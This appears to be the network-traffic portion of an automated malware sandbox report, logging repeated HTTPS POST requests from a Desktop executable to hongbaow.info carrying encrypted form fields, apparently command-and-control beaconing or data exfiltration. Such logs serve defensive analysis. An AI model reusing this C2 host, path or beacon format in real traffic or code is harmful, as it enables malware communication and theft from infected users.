                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1795&min_rtt=1793&rtt_var=677&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1612368&cwnd=203&unsent_bytes=0&cid=f0e7f2762a0e3256&ts=317&x=0"
                                      2025-01-22 07:42:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.455899104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:15 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:15 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:42:15 UTC811INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:15 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ACnqsXL%2F9EzzpOpmGaNZJorSERAPNmJZFvJ7Dxm%2Fdq1AB84cUKNR9%2BiXplf%2FTkUYtI1CwaCFC4B6pUcA9fD4KF9Xv1ddFGpYmXFcyRTnKMnn%2BbJtfkH41xC1AbGhB1DY"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de8019c17c470-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1479&rtt_var=556&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1974306&cwnd=219&unsent_bytes=0&cid=4b268f5d7084cd7b&ts=340&x=0"
                                      2025-01-22 07:42:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.455900104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:16 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:16 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:42:16 UTC810INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:16 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xqaNAvoPaFwN1kt5KIHg%2FAAPrYALD8zbc%2FBFqrH6HVrBxnmyHjs0q4%2FvcKphpInIdPzv4LwbEh1mPmfqSoFySEwWc%2Fc66Z6RfqWe48LZjjIaMmy2qxjblVa736aLguGD"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de8095d9243be-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1547&rtt_var=594&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1819314&cwnd=231&unsent_bytes=0&cid=791c255e057dd2b6&ts=317&x=0"
                                      2025-01-22 07:42:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.455901104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:19 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:19 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:42:19 UTC809INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:19 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gPmgOLEDKcC%2BpjjtyPqQoXtgFt1UGKckdIR05UZX9FwkYEPt97GXBlHCdqsAJDb3OrFFYeBEcCn9Fe964RYtiLbO5jG5AeSdT91YD%2F7FBVlNajaj%2Bq0pQzmTKQqM%2BIw9"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de819af6ac470-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1454&min_rtt=1445&rtt_var=561&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2830&recv_bytes=952&delivery_rate=1918528&cwnd=219&unsent_bytes=0&cid=90ab7034b255fafd&ts=370&x=0"
                                      2025-01-22 07:42:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.2.455902104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:22 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:22 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:42:22 UTC804INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:22 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xjcYE9dDH71sX4r48SsBAYgZBZcgmC78HqUdwCa3vxdyiOoFfCeB31xhzt%2BKFdPUmAeFCnmIgENkKRioAUk2lfSdu4aAWvFC8v1Dl8BrAliXezioZJYNfsICgAxNlRiT"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de82e1967f5f4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1435&min_rtt=1431&rtt_var=545&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1170&delivery_rate=1991814&cwnd=107&unsent_bytes=0&cid=7f72536996bf0046&ts=326&x=0"
                                      2025-01-22 07:42:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      17192.168.2.455903104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:22 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:22 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:42:23 UTC811INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:23 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YrCnC9d2mzoDT%2FJox74fgcTSArW3GgTOpOz%2B0pfGaCAcrGvN4%2Fk9KfFOvS50wVXL1X%2BtxKqO0Ln9Kxrm9iKOi8OwflVpeb0VQYrHnDUZCHi9a1eQVc%2FVnI0EBAwIYedq"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de83178ca8c11-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1770&rtt_var=673&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1613259&cwnd=203&unsent_bytes=0&cid=02a59f96d468ae12&ts=325&x=0"
                                      2025-01-22 07:42:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.2.455904104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:26 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:26 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:42:27 UTC807INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:26 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xheyt25eH4Oq0Dezn%2F27LJrhqibBKD7AROjmNKnNqxnNpF7ajoYUVqGenTPDq5qCGwtH5FDU3zYStwAvwPANiwIlCPUfq%2FSyk7ALXaE8SGMPYRYMmvqa%2BSnvglG5nzdq"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de8495aa743be-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1533&rtt_var=641&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1624930&cwnd=231&unsent_bytes=0&cid=9e07c557c38332e0&ts=328&x=0"
                                      2025-01-22 07:42:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.455905104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:28 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:28 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:42:28 UTC814INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:28 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yIW7Dibcmt1%2F8ygspeRQK7%2BtbHep0vM8yb5m5S91UiVAXFpIyBIF9I64g5YylVhIwEpldHtUhZPorhPFU35iTVV%2BFEVzfKk0vIsL%2F4Vg0b9lw%2BlmET1fztVxYDL%2BmmRA"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de8524fd7f5f4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1451&min_rtt=1445&rtt_var=554&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1170&delivery_rate=1955793&cwnd=107&unsent_bytes=0&cid=6db9c8a68f9a792e&ts=330&x=0"
                                      2025-01-22 07:42:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.2.455906104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:30 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:30 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:42:30 UTC813INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:30 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BHTdfHcdD4cfUV4h262Q%2Ff9Cz9XRv8zR2W%2BL7jHX%2BvCx0ak52d%2FUNvuXN6tuW7QVvIgLdVX6iCbu7gDXt%2BQzsAvxeMnVqq%2B556wr0HjhuVnZiIlgtZt2ccjlwpxiQ6i3"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de8610bdff5f4-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1516&min_rtt=1505&rtt_var=587&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=952&delivery_rate=1829573&cwnd=107&unsent_bytes=0&cid=88ac524198e80817&ts=321&x=0"
                                      2025-01-22 07:42:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      21192.168.2.455907104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:33 UTC197OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 313
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:33 UTC313OUTData Raw: 75 65 64 66 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d 23 2a 2a 23 4c 37 72 64 48 37 6e 43 45 58 35 66 6e 6b 7a 2f 62 71 61 6a 34 57 45 76 47 56 69 58 58 36 78 62 75 78 34 6f 31 78 4a 44 39 77 73 3d 23 2a 2a 23 72 48 65 56 52 6c 52 36 39 4a 62 2f 6a 50 65 37 58 72 54 44 78 69 55 73 47 73 68 64 34 53 76 65 7a 4c 35 52 4a 33 33 6c 75 43 45 3d 23 2a 2a 23 2f 36 6e 6e 75 4e 53 39 54 78 47 59 4c 67 2b 4e 4c 44 6e 2b 6d 41 3d 3d 23 2a 2a 23 65 34 65 39 6f 61 79 64 43 56 64 48 4c 39 36 46 71 48 4c 70 68 51 3d 3d 23 2a 2a 23 46 7a 2b 56 62 78
                                      Data Ascii: uedf=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==#**#L7rdH7nCEX5fnkz/bqaj4WEvGViXX6xbux4o1xJD9ws=#**#rHeVRlR69Jb/jPe7XrTDxiUsGshd4SvezL5RJ33luCE=#**#/6nnuNS9TxGYLg+NLDn+mA==#**#e4e9oaydCVdHL96FqHLphQ==#**#Fz+Vbx
                                      2025-01-22 07:42:34 UTC814INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:34 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K2Jn1cJvvWcW8PDmMhcGFAEzhlg0s640G5it59YO5raxINbrcPGIw2rIVr%2BEzTC%2BrJhvZ4ygY1A124tseUSLfzc78e4%2Fst%2BzCIXUPA%2BokRXrKHN8yUtTBO%2FaDXxHSrwg"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de876ea2a8ce6-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1769&min_rtt=1764&rtt_var=672&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1170&delivery_rate=1615044&cwnd=162&unsent_bytes=0&cid=8092881d5fd0b806&ts=339&x=0"
                                      2025-01-22 07:42:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      22192.168.2.455908104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:34 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
                                      2025-01-22 07:42:34 UTC96OUTData Raw: 66 75 66 6f 6b 69 6e 3d 37 58 77 67 48 41 36 45 2f 61 53 71 45 31 6d 51 6b 4a 62 31 46 6b 44 4f 4c 6f 78 4a 33 44 37 4f 63 67 72 57 42 69 6a 67 31 4a 78 65 76 45 31 35 2f 50 53 67 48 6f 2f 6e 31 78 33 34 78 44 4f 4c 6d 6a 47 35 43 4f 58 4f 77 71 71 61 68 70 57 47 59 4f 4b 52 78 41 3d 3d
                                      Data Ascii: fufokin=7XwgHA6E/aSqE1mQkJb1FkDOLoxJ3D7OcgrWBijg1JxevE15/PSgHo/n1x34xDOLmjG5COXOwqqahpWGYOKRxA==
                                      2025-01-22 07:42:34 UTC817INHTTP/1.1 200 OK
                                      Date: Wed, 22 Jan 2025 07:42:34 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      X-Powered-By: PHP/7.4.33
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o87FflNsUUFAe2x3AyMdItWqSbrIfznbuKV1uxTGeKFRQcgr01KLAIK%2BMuoYwKKk%2FtcXhVpzKk7GEu8J18%2FAf39CB4%2BqOiqanUtCtPo3t2e2P%2B%2F0E2xic6XMwxj%2BDm%2FY"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 905de8793cd3c470-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1500&min_rtt=1495&rtt_var=572&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=952&delivery_rate=1893644&cwnd=219&unsent_bytes=0&cid=75ddd121a303e535&ts=345&x=0"
                                      2025-01-22 07:42:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      23192.168.2.455909104.21.48.14436932C:\Users\user\Desktop\jhdfer3s_jh3de.exe
                                      TimestampBytes transferredDirectionData
                                      2025-01-22 07:42:38 UTC196OUTPOST /1WrCVzW4kSDNbNTt/cqWf4vQlofzqFkc7.php HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0
                                      Host: hongbaow.info
                                      Content-Length: 96
                                      Cache-Control: no-cache
